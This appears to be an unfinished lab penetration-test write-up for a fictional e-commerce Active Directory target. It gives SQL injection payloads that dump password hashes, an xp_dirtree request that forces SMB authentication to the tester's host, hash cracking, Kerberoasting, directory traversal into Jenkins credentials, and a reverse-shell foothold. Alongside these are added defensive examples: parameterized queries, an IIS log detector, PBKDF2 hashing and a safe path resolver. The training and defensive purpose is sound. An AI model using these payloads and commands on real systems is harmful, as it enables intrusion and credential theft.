# NovaCart (Hard)

### Objective

NovaCart is an e-commerce company that operates a webshop for PC accessories. However, the entire platform is still under active development and expansion.

The IT team is currently working on a Linux-based version of the webshop as well as the development of a mobile app for NovaCart. The team is focused on adding features quickly, and has not prioritized security.

We have been tasked with conducting a penetration test to thoroughly assess the environment, identify vulnerabilities, and evaluate the overall security of the system.

### Scanning

```
nmap -p- --min-rate 1000 -vv 10.1.106.238

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5000/tcp  open  upnp
5985/tcp  open  wsman
8080/tcp  open  http-proxy
9389/tcp  open  adws
```

The exposed services strongly suggested that the target was an Active Directory environment. Additional web services were also identified on ports `80`, `5000`, and `8080`.

### Website (5000)

The site on port 5000 prompts for authentication; we noted this for later.

<figure><img src="/files/iT48mA2efSvDx7HuYFOL" alt=""><figcaption></figcaption></figure>

It uses NTLM authentication.

<div align="left"><figure><img src="/files/GR3MEJpc6t4Vd7qJbMXQ" alt=""><figcaption></figcaption></figure></div>

<figure><img src="/files/Xkhlb1gsZJ8aWEqhVyJl" alt=""><figcaption></figcaption></figure>

### Website (8080)

* It is running Jenkins and requires valid credentials.

<figure><img src="/files/d4yNUpMqa9AfBfqGOgQe" alt=""><figcaption></figcaption></figure>

### Website (80) Enumeration

Browsing the web application revealed an e-commerce platform containing categories such as:

* Graphic Cards
* Laptops
* PCs
* Motherboards
* Storage
* Accessories

<figure><img src="/files/DUyI0eJE8r7xpwUuKUTW" alt=""><figcaption></figcaption></figure>

A search function was available at the top of the page.

Searching for valid product names such as:

```
laptop
```

<figure><img src="/files/GV3zu8ObLjUgvcrcNadM" alt=""><figcaption></figcaption></figure>

returned matching products successfully.

### SQL Injection

Testing the search parameter for SQL injection revealed that the application was vulnerable.

```
' OR 1=1-- -
```

```
http://10.1.106.238/search.aspx?q=%27%20OR%201=1--%20-
```

The application returned all available products, confirming the presence of a SQL Injection vulnerability.

<figure><img src="/files/viV0AgpXp83gWTPtsCEc" alt=""><figcaption></figcaption></figure>

#### Determining the Number of Columns

To identify the number of columns in the query, the following payload was used:

```
' ORDER BY 5-- -

#Encoded request:
'%20order%20by%205--%20-
```

`ORDER BY 5` succeeded, while `ORDER BY 6` generated a `500 Internal Server Error`, confirming that the query contained **5 columns**.

#### Identifying Reflected Columns

A UNION-based payload was used to determine which column was reflected in the response:

```
%' UNION SELECT '1','l1nuxkid','3','4','5'-- //
%25'+UNION+SELECT+'1',+'l1nuxkid',+'3',+'4',+'5'+--+//
```

The string `l1nuxkid` appeared in the application response, confirming that the **second column** was reflected.

<figure><img src="/files/qFlq2RNZ0iUipfCJjPqX" alt=""><figcaption></figcaption></figure>

#### Database Enumeration

The current database name was extracted using:

```
%' UNION SELECT '1', DB_NAME(), '3', '4', '5' -- //
http://10.1.106.238/search.aspx?q=%' UNION SELECT '1', DB_NAME(), '3', '4', '5' -- //
```

This revealed the database name: `NovaCart`

<figure><img src="/files/5AwTsiGB5rgnowP47jK6" alt=""><figcaption></figcaption></figure>

#### Database User

The database user context was identified using:

```
http://10.1.106.238/search.aspx?q=admin%27%20union%20select%20%271%27,user_name(),%273%27,%274%27,%275%27--%20-//

admin' UNION SELECT '1',USER_NAME(),'3','4','5'-- -
```

This returned the username:

```
IIS APPPOOL\DefaultAppPool
```

<figure><img src="/files/izIDgXB8mkFuvBEiecMu" alt=""><figcaption></figcaption></figure>

#### Enumerating Tables and Columns

```
%' UNION SELECT '1', table_name, '3', '4', '5' FROM information_schema.tables WHERE table_catalog='novacart' -- //
```

<figure><img src="/files/RufzlVPCHVBmmtb6uojN" alt=""><figcaption></figcaption></figure>

A table named `users` was identified.

Now that the table name is known, the column names were enumerated:

```
%' UNION SELECT '1', column_name, '3', '4', '5' FROM information_schema.columns WHERE table_name='users' -- //
```

<figure><img src="/files/eQktzgd0Iw7rFZYWxYdT" alt=""><figcaption></figcaption></figure>

We now know the following:

* Database name = `novacart`
* Table name = `users`
* Column names = `id`, `password_hash`, `username`

#### Dumping User Credentials

Let's dump the `username` and `password_hash` columns from the `users` table in the `novacart` database:

```
' UNION select '1',username,'3','4','5' from users-- //
```

<figure><img src="/files/2d3haIh5bSI0vXMWE9Xc" alt=""><figcaption></figcaption></figure>

Now dump `password_hash`:

```
%' UNION SELECT '1',password_hash,'3','4','5' from users-- //
```

<figure><img src="/files/6wQEp33MjrQH6bdVsAoV" alt=""><figcaption></figcaption></figure>

### Combining Results

Alternatively, both columns can be retrieved in a single request using the `CONCAT()` or `CONCAT_WS()` function:

```
%' UNION SELECT '1', CONCAT(username, ':', password_hash), '3', '4', '5' FROM users -- //
%' UNION SELECT '1', CONCAT_WS(':', username, password_hash), '3', '4', '5' FROM users -- //
```

<figure><img src="/files/fslNF6GA8Lf7caaiidoo" alt=""><figcaption></figcaption></figure>

We now have usernames and password hashes:

| username   | password\_hash                                                        |
| ---------- | --------------------------------------------------------------------- |
| d.barowski | 57eeb5788565564c9a3a0283eb615204534583a8fbd3ccae1637a04df12287b1:jb43 |
| d.winkler  | 65a3657685b09db625ef25da7754d7d140e75c3640dc2482de87218ee8d85b2b:jb44 |
| j.paul     | 66be630f32845c0d7b098b4d94f1ca424ae3e35266267078f7974248caf412ac:jb45 |
| m.ruehl    | bf9b834e082c88823b59d05446a819276a907114c928505b829ddbbad73d6d35:jb42 |
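
The following is an added example and not code from the NovaCart application: a minimal reimplementation of the product search in Python on SQLite (the target is MSSQL, but the string-concatenation defect and the parameterized fix behave the same), with constructed product and user rows. It runs the page's own payloads against a vulnerable `search_vulnerable()` and a parameterized `search_safe()`, including the `ORDER BY` column-count probe, to show why binding the input as a parameter closes the whole chain above.

```python
import sqlite3

# Constructed schema and rows. The five selected columns match the column count the
# ORDER BY probe established on the page; the users row is a placeholder, not page data.
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, category TEXT, price REAL, stock INTEGER);
CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
INSERT INTO products VALUES
  (1, 'Gaming Laptop 15', 'Laptops', 1299.0, 4),
  (2, 'RTX Graphics Card', 'Graphic Cards', 899.0, 2),
  (3, 'NVMe SSD 1TB', 'Storage', 129.0, 10);
INSERT INTO users VALUES (1, 'demo.user', 'placeholderhash:jb00');
"""

# Payloads exactly as they appear on the page
PAYLOAD_TAUTOLOGY = "' OR 1=1-- -"
PAYLOAD_UNION = "%' UNION SELECT '1',username,'3','4','5' FROM users-- //"


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_vulnerable(con, q):
    """Builds the statement by concatenation, the defect behind search.aspx?q=..."""
    sql = ("SELECT id, name, category, price, stock FROM products "
           f"WHERE name LIKE '%{q}%'")
    return con.execute(sql).fetchall()


def search_safe(con, q):
    """Same query with a bound parameter: the input can only ever be a LIKE pattern."""
    sql = ("SELECT id, name, category, price, stock FROM products "
           "WHERE name LIKE ?")
    return con.execute(sql, (f"%{q}%",)).fetchall()


def column_count_via_order_by(con, search_fn, limit=10):
    """Reproduces the ORDER BY probe: the last n that does not raise is the column count
    (on the real target the failing request surfaced as a 500). Returns None when no n
    raises within the limit, which is what the parameterized search yields, because the
    'payload' is just pattern data there."""
    for n in range(1, limit + 1):
        try:
            search_fn(con, f"' ORDER BY {n}-- -")
        except sqlite3.Error:
            return n - 1
    return None


if __name__ == "__main__":
    con = connect()
    print("vulnerable, tautology:", len(search_vulnerable(con, PAYLOAD_TAUTOLOGY)), "rows")
    print("safe, tautology:      ", len(search_safe(con, PAYLOAD_TAUTOLOGY)), "rows")
    print("vulnerable, columns:  ", column_count_via_order_by(con, search_vulnerable))
    print("safe, columns:        ", column_count_via_order_by(con, search_safe))
    print("vulnerable, UNION:    ", search_vulnerable(con, PAYLOAD_UNION))
    print("safe, UNION:          ", search_safe(con, PAYLOAD_UNION))
```

In the ASP.NET original the equivalent fix is a `SqlCommand` with `SqlParameter` values rather than a concatenated string; independently of that, the `IIS APPPOOL\DefaultAppPool` login should have read access to the product tables only, so that a residual injection cannot reach `users`, `information_schema` or `master`.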

### Attempted Hash Capture via xp\_dirtree

I also attempted to coerce SMB authentication using `xp_dirtree`:

```
GET /search.aspx?q=abcd'; use master; exec xp_dirtree '\\10.200.55.193\share';-- -
```

However, the captured machine account hash was not useful for further exploitation, as it could not be cracked.

<figure><img src="/files/CbWySgNJTg7Kj31w3F1d" alt=""><figcaption></figcaption></figure>
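
As an added detection example, not from the page or the lab, the script below scans IIS W3C log lines for the request patterns used in this section and the ones above: it URL-decodes `cs-uri-query` (bounded, so a double-encoded request does not slip past), then matches the tautology, the `ORDER BY` probe, `UNION SELECT`, metadata functions such as `DB_NAME()` and `information_schema`, and `xp_` extended procedure calls with a batch separator. The log excerpt is constructed: its queries mirror the page's payloads, while the timestamps, status codes and client address are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (the #Fields line names the columns, as IIS writes it).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-01-10 09:12:01 10.1.106.238 GET /search.aspx q=laptop 80 - 10.200.55.193 Mozilla/5.0 200
2025-01-10 09:12:20 10.1.106.238 GET /search.aspx q=%27%20OR%201=1--%20- 80 - 10.200.55.193 Mozilla/5.0 200
2025-01-10 09:13:05 10.1.106.238 GET /search.aspx q=%27%20order%20by%206--%20- 80 - 10.200.55.193 Mozilla/5.0 500
2025-01-10 09:14:11 10.1.106.238 GET /search.aspx q=%25%27+UNION+SELECT+%271%27,DB_NAME(),%273%27,%274%27,%275%27+--+// 80 - 10.200.55.193 Mozilla/5.0 200
2025-01-10 09:15:40 10.1.106.238 GET /search.aspx q=abcd%27;+use+master;+exec+xp_dirtree+%27%5C%5C10.200.55.193%5Cshare%27;--+- 80 - 10.200.55.193 Mozilla/5.0 200
2025-01-10 09:16:02 10.1.106.238 GET /default.aspx - 80 - 10.1.106.50 Mozilla/5.0 200
"""

# Each signature corresponds to one step of the injection chain documented on the page.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "schema_enum": re.compile(r"information_schema|db_name\(|user_name\(", re.I),
    "extended_proc": re.compile(r"\bxp_\w+", re.I),
    "batch_separator": re.compile(r";\s*(use|exec|execute)\s", re.I),
}


def parse_w3c(text):
    """Yields one dict per record, using the #Fields directive to name the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def decode_query(raw, rounds=2):
    """URL-decodes repeatedly (bounded) so a double-encoded payload is still matched."""
    text = raw
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_iis_log(text):
    """Returns one finding per request whose decoded query matches any signature."""
    findings = []
    for rec in parse_w3c(text):
        query = decode_query(rec.get("cs-uri-query", "-"))
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if hits:
            findings.append({
                "time": f"{rec['date']} {rec['time']}",
                "client": rec["c-ip"],
                "uri": rec["cs-uri-stem"],
                "status": rec["sc-status"],
                "query": query,
                "signatures": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["status"], f["signatures"], f["query"])
```

A run of `order_by_probe` hits from one client with a final `500`, followed by `union_select`, is the enumeration sequence above as it appears from the server side; the `extended_proc` hit is the one that should page someone, since `xp_dirtree` from the web application's login means the app pool identity can reach `master`.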

### Hash Cracking

```
hash-identifier 57eeb5788565564c9a3a0283eb615204534583a8fbd3ccae1637a04df12287b1
```

<figure><img src="/files/9JYB2taBIZeDSFapCA3o" alt=""><figcaption></figcaption></figure>

After testing multiple Hashcat modes, mode `1420` successfully matched the hash format.

<figure><img src="/files/rz8nMAmby06mvWuUpMdc" alt=""><figcaption></figcaption></figure>

```
hashcat hashes /usr/share/wordlists/rockyou.txt -m 1420
```

<figure><img src="/files/B2U3GTLHLGHjSbcJ7N0W" alt=""><figcaption></figcaption></figure>
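
The stored format, `<sha256 hex>:<salt>` where the hex is `sha256(salt + password)` (what Hashcat mode 1420, `sha256($salt.$pass)`, computes), is a single fast hash, which is why rockyou got through it in seconds. As an added example, not the application's code, here is a verifier for that legacy layout next to a PBKDF2-HMAC-SHA256 replacement and a login path that transparently rehashes a legacy record on the user's next successful login. The record layout is assumed from the dump above; the demo row is constructed, not one of the page's hashes.

```python
import base64
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000   # OWASP's current minimum for PBKDF2-HMAC-SHA256


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


def legacy_make(salt: str, password: str) -> str:
    """Builds a record in the legacy '<hex>:<salt>' layout (only used to construct demo rows)."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return f"{digest}:{salt}"


def legacy_verify(stored: str, candidate: str) -> bool:
    """Checks a candidate against the legacy layout; constant-time compare on the hex."""
    digest, _, salt = stored.partition(":")
    calc = hashlib.sha256((salt + candidate).encode()).hexdigest()
    return hmac.compare_digest(calc, digest)


def modern_hash(password: str, salt: bytes = None) -> str:
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; self-describing record."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, _b64(salt), _b64(dk))


def modern_verify(stored: str, candidate: str) -> bool:
    algo, iters, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    calc = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, int(iters))
    return hmac.compare_digest(calc, expected)


def login_and_upgrade(stored: str, candidate: str):
    """Verifies against whichever layout the record uses. On a successful login against a
    legacy record the plaintext is in hand, so the record is rehashed with PBKDF2 and the
    caller stores the returned value; failures leave the record untouched."""
    if stored.startswith("pbkdf2_sha256$"):
        return modern_verify(stored, candidate), stored
    if legacy_verify(stored, candidate):
        return True, modern_hash(candidate)
    return False, stored


if __name__ == "__main__":
    record = legacy_make("jb00", "correct horse")      # constructed demo row
    ok, record = login_and_upgrade(record, "correct horse")
    print(ok, record[:40] + "...")
```

The migration needs no password reset: each account is upgraded the first time its owner logs in, and any record still in the legacy layout after a grace period is a dormant account worth reviewing on its own.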

### SMB Enumeration

```
nxc smb novacart.local -u usernames -p pass --continue-on-success
```

<figure><img src="/files/6FYeIcSYNTp0ykdfNAQn" alt=""><figcaption></figcaption></figure>

We now have valid credentials:

```
j.paul : password123
d.barowski : kubarow
```

Enumerated all domain users:

```
nxc smb novacart.local -u j.paul -p password123 --users-export user
```

<figure><img src="/files/XMThxmab8l0zv6OJSLa6" alt=""><figcaption></figcaption></figure>

```
nxc smb novacart.local -u j.paul -p password123 --shares
```

<figure><img src="/files/965aifrpUJxQs9sGQw9t" alt=""><figcaption></figcaption></figure>

* A non-default share named `shares` was identified.

```
smbclient  //novacart.local/shares -U j.paul
```

Poking around the share turned up a couple of things that were used later: a `jenkins.ini` file, and a note about the user `j.dhillon` (pending removal), who might have privileges and an autologon configured.

### BloodHound Collection

```
bloodhound-python -u j.paul -p password123 -k -ns 10.1.106.238 -c All -d novacart.local --zip
```

<figure><img src="/files/sTrNmNXpznxnTF1gnJ4B" alt=""><figcaption></figcaption></figure>

### GenericWrite over J.BRONSKI

Analyzing the BloodHound data showed that `d.barowski` had `GenericAll` privileges over multiple users, including `j.bronski`.

The user `j.bronski` was especially interesting because the account belonged to the `WEBAPP_OPERATORS` group.

<figure><img src="/files/W5NQe6cPXVDIOwTouDXF" alt=""><figcaption></figcaption></figure>

```
targetedKerberoast.py -v -d 'novacart.local' -u 'd.barowski' -p 'kubarow'
```

<figure><img src="/files/yKPskJBG7PBFkXEeYZEI" alt=""><figcaption></figcaption></figure>

```
hashcat hash /usr/share/wordlists/rockyou.txt

$krb5tgs$23$*j.bronski$NOVACART.LOCAL$61bff39a0757--SNIP--:jan162005
```

Looking at the shortest path to Domain Admin:

<figure><img src="/files/KaysZ00IBXJLmlBMD80H" alt=""><figcaption></figcaption></figure>

### Using the credentials of `j.bronski` on port 5000

Using the credentials for `j.bronski`, authentication to the web application on port `5000` was successful.

```
j.bronski : jan162005
```

The portal exposed:

* system information
* an IT Team Management Portal

While browsing the application, the following parameter was observed:

`view.aspx?file=it_team.aspx`

<figure><img src="/files/eAJcVUoDy2CvWIWvZi79" alt=""><figcaption></figcaption></figure>

### Directory Traversal

<figure><img src="/files/wacYsd14bVpT5GxkqsD8" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Noox3LwV274pxp7oI0TW" alt=""><figcaption></figcaption></figure>

During earlier SMB enumeration, a file named `jenkins.ini` had been identified within the shared drive.

Using directory traversal through the vulnerable `file` parameter, the `jenkins.ini` file was successfully read, revealing valid Jenkins credentials.

<figure><img src="/files/CUjQIjXKlxMAZPtbSh3h" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dFcNF0GjLNZiMfXaapsb" alt=""><figcaption></figcaption></figure>
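
An added example, not the NovaCart code, of how the `file` parameter of `view.aspx` should be handled: decode once, treat backslashes as separators since the host is IIS on Windows, accept only a single file name with an allow-listed extension from one views directory, and re-check after `resolve()` so a symlink inside the directory cannot point outside it either. The directory layout built by `make_demo_tree()` is constructed for the demo; the traversal strings in the test are the generic `..` forms, not anything specific to the lab.

```python
import tempfile
from pathlib import Path
from urllib.parse import unquote

ALLOWED_SUFFIXES = (".aspx",)


def resolve_view_file(views_dir, requested):
    """Maps a 'file=' value to a path inside views_dir or raises ValueError.

    Policy: exactly one path component, no '..', no absolute paths, allow-listed
    extension, and the resolved parent must still be views_dir (catches symlinks)."""
    base = Path(views_dir).resolve()
    # Decode once (IIS already decoded the query string; this covers %2e%2e-style input
    # that arrives pre-decoded in a test), then normalise Windows separators.
    name = unquote(requested).replace("\\", "/")
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if name.startswith("/") or ".." in parts or len(parts) != 1:
        raise ValueError(f"rejected {requested!r}: must be a single file name")
    candidate = (base / parts[0]).resolve()
    if candidate.parent != base:
        raise ValueError(f"rejected {requested!r}: resolves outside the views directory")
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        raise ValueError(f"rejected {requested!r}: extension not allowed")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def make_demo_tree():
    """Constructed layout: a views directory with one page and a sibling directory
    holding a placeholder config, standing in for the jenkins.ini reached on the page."""
    root = Path(tempfile.mkdtemp())
    views = root / "views"
    views.mkdir()
    (views / "it_team.aspx").write_text("<h1>IT Team Management</h1>\n")
    secret = root / "secret"
    secret.mkdir()
    (secret / "jenkins.ini").write_text("user=PLACEHOLDER\npassword=PLACEHOLDER\n")
    return views


if __name__ == "__main__":
    views = make_demo_tree()
    print("ok:", resolve_view_file(views, "it_team.aspx"))
    for bad in ("../secret/jenkins.ini", "..\\secret\\jenkins.ini", "%2e%2e/secret/jenkins.ini"):
        try:
            resolve_view_file(views, bad)
        except ValueError as exc:
            print("blocked:", exc)
```

A server-side allow-list of page names (a dictionary from `it_team` to the file) is simpler still and removes the file-system path from the request entirely; the resolver above is for the case where the parameter must stay a file name.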

### Port 8080 | Jenkins

<figure><img src="/files/d4yNUpMqa9AfBfqGOgQe" alt=""><figcaption></figcaption></figure>

Authentication using the credentials recovered from `jenkins.ini` was successful.

<figure><img src="/files/M2RggtmMqQ0RERI5DGQk" alt=""><figcaption></figcaption></figure>

Navigating to `/script` provides access to the Jenkins Script Console.

A Groovy reverse shell payload was executed, resulting in remote command execution.

<figure><img src="/files/lKpWGmnE8BJYwuQ8eAs3" alt=""><figcaption></figcaption></figure>

### Shell as svc\_jenkins

<figure><img src="/files/8zSN3uNvXz5BvcZqfmPO" alt=""><figcaption></figcaption></figure>

During enumeration of the SMB shares and internal files, references were found indicating that the user `j.dhillon` had an autologon configured.

<figure><img src="/files/FBbPE2T4BVlLKsoiOiSl" alt=""><figcaption></figcaption></figure>

PENDING

